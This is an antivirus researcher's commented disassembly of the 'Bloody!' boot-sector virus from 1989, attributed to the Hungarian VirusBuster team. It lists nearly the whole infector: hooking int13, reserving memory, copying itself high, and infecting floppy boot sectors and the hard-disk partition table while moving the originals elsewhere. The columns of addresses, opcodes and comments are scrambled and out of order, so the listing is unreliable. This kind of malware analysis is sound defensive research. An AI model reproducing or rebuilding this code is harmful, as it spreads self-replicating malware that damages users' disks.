
  • November 2019
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; ; ; ; ; ; ;

bloody! virus discovered an commented by ferenc leitold hungarian virusbuster team address: 1399 budapest p.o. box 701/349 hungary

217d:0100 217d:0105

2eff2e177c e9b500

jmp jmp

217d:0108 217d:0109 217d:010a

00 00 00

db db db

far cs:[7c17] 01bd ; jump to main entry point 0 0 0

; counter ; ;

; flag: 00 : floppy 80 : hard disk












; entry point at top





; address of orig. boot










; original int13 vector

;************************ int13 entry point ***************************** 217d:011f 217d:0122 217d:0124 217d:0127 217d:0129 217d:012c 217d:012e 217d:0131

80fc02 720d 80fc04 7308 80fa80 7303 e80500 2eff2e0b00

cmp jc cmp jnc cmp jnc call jmp

ah,02 ; check parameters 0131 ah,04 0131 dl,80 0131 0136 ; call, if ah=2,3 & dl!=80 far cs:[000b] ; jump to original int13

217d:0136 217d:0137 217d:0138 217d:0139 217d:013a 217d:013b 217d:013c 217d:013d

50 53 51 52 06 1e 56 57

push push push push push push push push

ax bx cx dx es ds si di

; save registers

217d:013e 217d:013f 217d:0140 217d:0141

0e 1f 0e 07

push pop push pop

cs ds cs es

; set ds,es to cs




si,0002 ; 2 probe

217d:0145 217d:0147

33c0 9c

xor pushf


; reset drive

217d:0148 217d:014c 217d:014f 217d:0152 217d:0155 217d:0157 217d:0158 217d:015c 217d:015e 217d:015f 217d:0161

ff1e0b00 b80102 bb0002 b90100 32f6 9c ff1e0b00 7305 4e 75e4 eb2e

call mov mov mov xor pushf call jnc dec jnz jmp

far [000b] ; call int13 ax,0201 ; read boot sector of floppy bx,0200 cx,0001 dh,dh

217d:0163 217d:0165 217d:0168 217d:016b 217d:016c 217d:016e

33f6 bf0002 b90300 fc f3a7 7421

xor mov mov cld rep jz

si,si ; check boot sector, if di,0200 ; if infected yet cx,0003

217d:0170 217d:0173 217d:0176 217d:0179 217d:017b 217d:017c 217d:0180

b80103 bb0002 b90300 b601 9c ff1e0b00 720f

mov mov mov mov pushf call jc

ax,0301 ; write orig. boot sector bx,0200 cx,0003 ; cyl: 0 sect: 3 dh,01 ; head: 1

217d:0182 217d:0185 217d:0187 217d:018a 217d:018c 217d:018d

b80103 33db b90100 32f6 9c ff1e0b00

mov xor mov xor pushf call

ax,0301 ; write infected boot sector bx,bx cx,0001 ; cyl:0 sect:1 dh,dh ; head: 0

217d:0191 217d:0192 217d:0193 217d:0194 217d:0195 217d:0196 217d:0197 217d:0198 217d:0199

5f 5e 1f 07 5a 59 5b 58 c3

pop pop pop pop pop pop pop pop ret

di si ds es dx cx bx ax

217d:019a 217d:01a0 217d:01a6 217d:01ac 217d:01b2 217d:01b8

1d1d1d1a3737 37373737557b 7878736e3637 5d6279393723 3b37262e2f2e 1d1d1d1a00

far [000b] ; call int13 0163 si ; if error next probe 0145 0191 ; jump, if 2 bad probes was

cmpsw 0191

; jump, if already infected

far [000b] 0191

; call int13

far [000b] ; restore registers

; coded text: ; "\r\r\r\n bloody! jun. 4, 1989\r\r\r\n"

;************************** main entry point ******************************* 217d:01bd 217d:01bf 217d:01c1 217d:01c2 217d:01c4

33c0 8ed8 fa 8ed0 bc007c

xor mov cli mov mov

ax,ax ds,ax ss,ax sp,7c00




217d:01c8 217d:01cb 217d:01ce 217d:01d1

a14c00 a30b7c a14e00 a30d7c

mov mov mov mov

ax,[004c] [7c0b],ax ax,[004e] [7c0d],ax

; save orig. int13 vector

217d:01d4 217d:01d7 217d:01d8 217d:01d9

a11304 48 48 a31304

mov dec dec mov

ax,[0413] ax ax [0413],ax

; decrease memory by 2kb

217d:01dc 217d:01de 217d:01e0

b106 d3e0 a3117c

mov shl mov

cl,06 ax,cl [7c11],ax

; calculate segment

217d:01e3 217d:01e6 217d:01e8 217d:01eb

a34e00 8ec0 b81f00 a34c00

mov mov mov mov

[004e],ax es,ax ax,001f [004c],ax

; set new int13 vector




[7c0f],0103 ; to top

; set jmp argument points

217d:01f4 217d:01f7 217d:01f9 217d:01fc 217d:01fd 217d:01ff

be007c 33ff b90001 fc f3a5 ff2e0f7c

mov xor mov cld rep jmp

si,7c00 ; copy itself to top di,di cx,0100

top :0203 top :0205

33c0 cd13

xor int

ax,ax 13

top top top top top top top top

0e 1f 33c0 8ec0 b80102 bb007c 803e0a0000 7435

push pop xor mov mov mov cmp jz

cs ds ; ax,ax es,ax ax,0201 bx,7c00 [000a],00 024f

top top top top top top top top top top

:0207 :0208 :0209 :020b :020d :0210 :0213 :0218

:021a :021d :0220 :0222 :0223 :0224 :0228 :022d :022f :0234

b90600 ba8000 cd13 0e 07 fe060800 803e080080 721e c60608007a fc

mov mov int push pop inc cmp jc mov cld

movsw far [7c0f]

; jmp to top ; reset drive ; set registers to load original sector

; check, if it is floppy ? ; jump, if floppy

; if hard disk, load ; orig. part. table cx,0006 ; cyl.: 0 sect.: 6 dx,0080 ; head: 0 13 cs es b/[0008] ; increase counter [0008],80 024d ; if counter < 128 -> no text [0008],7a

top top top top top top top top top

:0235 :0238 :0239 :023b :023d :0241 :0243 :0245 :0247

be9a00 ac 3c00 740c 32060300 b40e b700 cd10 ebef

mov lodsb cmp jz xor mov mov int jmp

si,009a ; write coded text via bios

top :0249 top :024b top :024d

b400 cd16 eb54

mov int jmp

ah,00 16 02a3

top :024f top :0252 top :0255

b90300 ba0001 cd13

mov mov int

; if floppy cx,0003 ; read orig. boot sector dx,0100 ; cyl: 0 hd: 1 sect: 3 13

top :0257 top :0258 top :0259

0e 07 721d

push pop jc

cs es 0278

top top top top top top

:025b :025e :0261 :0264 :0267 :0269

b80102 bb0002 b90100 ba8000 cd13 720d

mov mov mov mov int jc

ax,0201 ; load part. table of bx,0200 ; 1st hard disk cx,0001 dx,0080 13 0278 ; jump, if error occured

top top top top top top

:026b :026e :0270 :0273 :0274 :0276

be0002 33ff b90300 fc f3a7 750e

mov xor mov cld rep jnz

si,0200 ; check 1st 3 word di,di cx,0003

top :0278 top :027d top :0282

c6060a0000 c606080000 ff2e1300

mov mov jmp

; if infected [000a],00 ; [0008],00 ; far [0013] ;

top top top top top

:0286 :0289 :028c :028f :0291

b80103 bb0002 b90600 cd13 72e5

mov mov mov int jc

ax,0301 ; write orig. part. table bx,0200 cx,0006 ; cyl: 0 sect: 6 hd: 0 13 0278

top top top top top

:0293 :0296 :0299 :029c :029e

bebe03 bfbe01 b92101 f3a5 c6060a0001

mov mov mov rep mov

si,03be ; copy partition info di,01be ; after virus body cx,0121 movsw [000a],01



ax,0301 ; write boot sector or ; partition table with ; increased counter

top :02a3

al,00 0249 al,[0003] ah,0e bh,00 10 0238 ; wait for keystroke

; jump, if error occured

cmpsw 0286 yet set flag to 0 reset counter jump to orig. boot

top :02a6 top :02a8 top :02ab

33db b90100 cd13

xor mov int

bx,bx cx,0001 13

top top top top top

:02ad :02b0 :02b3 :02b6 :02b8

bebe04 bfbe01 b92000 f3a5 ebbe

mov mov mov rep jmp

top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top

:02ba :02bc :02be :02c0 :02c2 :02c4 :02c6 :02c8 :02ca :02cc :02ce :02d0 :02d2 :02d4 :02d6 :02d8 :02da :02dc :02de :02e0 :02e2 :02e4 :02e6 :02e8 :02ea :02ec :02ee :02f0 :02f2 :02f4 :02f6 :02f8 :02fa :02fc :02fe :02ff

de07 df07 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 55 aa

esc esc add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add push stosb

si,04be ; clear area of partition di,01be ; info cx,0020 movsw 0278 ; set parameters & ; jump to orig. boot 30,[bx] 38,[bx] [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al bp

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